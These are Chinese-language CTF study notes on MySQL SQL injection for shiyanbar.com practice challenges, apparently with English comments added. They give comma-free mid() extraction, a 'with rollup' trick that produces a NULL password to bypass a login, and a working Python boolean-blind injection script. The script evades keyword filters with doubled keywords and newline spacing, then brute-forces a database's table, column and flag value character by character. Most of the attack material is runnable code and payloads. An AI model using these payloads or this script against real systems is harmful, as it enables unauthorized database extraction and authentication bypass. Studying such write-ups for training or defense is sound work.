注入

學習筆記 UpdateXml() MYSQL顯錯注入

實驗吧 加了料的報錯注入 https://blog.csdn.net/xingyyn78/article/details/79737070

認真一點報錯注入
-- Each expression yields one character of the current database name
-- (position 1, 2, 3).  `mid(expr from pos for len)` is the keyword form of
-- the substring function and contains no comma, which is the point the
-- note below this listing makes.
mid((database())from(1)for(1))
mid((database())from(2)for(1))
mid((database())from(3)for(1))
如果要用到mid函數,但是逗號被屏蔽了,就用這種形式


實驗吧 因缺思汀的繞過

表結構如下:


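-- Query quoted in the write-up.  The original text repeated `from` on two
-- consecutive lines (`select * from` / `from ...`), which is not valid SQL;
-- the duplicate is dropped here so the statement matches the one given
-- further down with `limit`.
-- `with rollup` appends a super-aggregate row to the grouped result whose
-- `password` value is NULL (the write-up's "a null aggregated in the
-- password field").  From the defender's side: if this table backs a login
-- check (presumably, given the `user`/`password` columns), a row with a NULL
-- password must never be accepted as a match, and `user` has to be bound as
-- a query parameter rather than interpolated - a keyword blacklist on
-- `group by` / `rollup` is not a fix.
select *
from `users`
where `user`=-1 || 1
group by `password` with rollup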

用了這個語句後結果爲



在password字段聚合了一個null

-- Same grouped query as above, with paging added: `LIMIT 1 OFFSET 5` skips
-- the first five rows and returns only the rollup row, i.e. the one whose
-- `password` is NULL (the write-up: "skip the first five, take the null").
-- Logic is unchanged from the original listing; only keyword casing and
-- layout differ.
SELECT *
  FROM `users`
 WHERE `user` = -1 || 1
 GROUP BY `password` WITH ROLLUP
 LIMIT 1 OFFSET 5


跳過前五條,拿出一個null(改一下select * 就行了)
配合其他 writeup 食用更佳
https://blog.csdn.net/wy_97/article/details/76085575
https://blog.csdn.net/yplee_8/article/details/52252549


實驗吧認真的

import requests

# Candidate characters tried at each position of the string being
# recovered (`for y in char_set` in the loops further down); the loops stop
# at the first candidate that tests true, so order matters.
char_set = r'~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'

# Number of candidates.  Computed but not referenced anywhere else in this
# script.
char_len = len(char_set)

# Hard-coded endpoint of the practice challenge the write-up is about; every
# request below is POSTed here.
url = r'http://ctf5.shiyanbar.com/web/earnest/index.php'

# One session object reused for all requests - presumably so cookies carry
# across the many POSTs; the script never reads them explicitly.
session = requests.session()

# Substring whose presence in the response body is taken to mean the
# injected predicate evaluated true (`if true_state in res.text`).
true_state = 'You are in'

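# Column counter for the single progress line written by my_print(); the line
# is wrapped once 70 characters have been echoed.
next_line_flag = 0

def my_print(char_word, next_line=False):
    """Echo progress for the character-by-character loops.

    Args:
        char_word: the candidate character (or recovered word) to show.
        next_line: when True, terminate the running progress line, announce
            ``char_word`` as a confirmed result and reset the column count;
            when False, append ``char_word`` to the progress line.

    Side effects: writes to stdout and updates the module-level
    ``next_line_flag`` column counter.
    """
    global next_line_flag
    if next_line:
        print()
        print('OK, got!', char_word)
        next_line_flag = 0
        return
    # Wrap the progress line every 70 characters.  The original version
    # returned here without echoing the character that triggered the wrap,
    # so one candidate per line was silently missing from the output; the
    # character is now printed at the start of the new line instead.
    if next_line_flag >= 70:
        print()
        next_line_flag = 0
    print(char_word, end='', flush=True)
    next_line_flag += 1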

# --- Boolean-based blind enumeration, as walked through in the write-up ---
# Every request sends one predicate in the `id` field and treats the page as
# "true" when `true_state` occurs in the response body; one character of the
# target string is accepted per true predicate (`flag_dump += y`).  Two
# filter-evasion tricks are visible in the payloads: keywords are written
# with a doubled fragment (`oorr`, `foorr`, `separatoorr`,
# `infoorrmation_schema`) and spaces are replaced by a line feed
# (`chr(0x0a)`).  From the defender's side the lesson is that a keyword
# blacklist on `id` does not stop this - the value must be bound as a query
# parameter - and that hundreds of near-identical POSTs differing in a single
# character are an easy traffic signal to detect and rate-limit.

# Brute-force the database name length (left commented out by the author)
# database_len = 0
# for x in range(50):
#     payload = "0'oorr((length(database()))=%s)oorr'0" % (x)
#     post_data = {'id': payload}
#     my_print(x)
#     res = session.post(url, data=post_data)
#     if true_state in res.text:
        # my_print(x, True)
        # database_len = x
        # break

database_len = 18  # hard-coded; the probe above is disabled (author's note: "removed")
db_name = ''

# Brute-force the database name (left commented out by the author)
# for x in range(database_len):
#     for y in char_set:
#         payload = "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
#         post_data = {'id': payload}
#         my_print(y)
#         res = session.post(url, post_data)
#         if true_state in res.text:
#             db_name += y
#             my_print(db_name, True)
#             break

# Brute-force the table name (left commented out by the author)
# table_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 table_name += y
#                 my_print(table_name, True)
#                 break

# except KeyboardInterrupt:
#     print('\n停止爆破錶名,繼續下一步')
table_name = 'fiag'
# Brute-force the column names.  Author's note: "not sure why, the column
# name seems broken and could not be recovered"; the expected result is
# fl$4g@id@username@password
column_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 column_name += y
#                 my_print(column_name, True)
#                 break

# except KeyboardInterrupt:
#     print('\n停止爆破錶名,繼續下一步')

column_name = r'fl$4g@id@username@password'

# Brute-force the value of column fl$4g in table fiag.
# Note: `column_name` is reassigned here but never read - the column and
# table names are spelled out literally inside the payload below.
column_name = r'fl$4g'
flag_dump = ''
try:
    for x in range(50):
        for y in char_set:
            payload = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)
            payload = payload.replace(' ', chr(0x0a))
            post_data = {'id': payload}
            my_print(y)
            res = session.post(url, data=post_data)
            if true_state in res.text:
                flag_dump += y
                my_print(flag_dump, True)
                break

# Ctrl-C ends the run early.  The message still says "stop brute-forcing the
# table name, continue to the next step" - a leftover from the earlier block.
except KeyboardInterrupt:
    print('\n停止爆破錶名,繼續下一步')
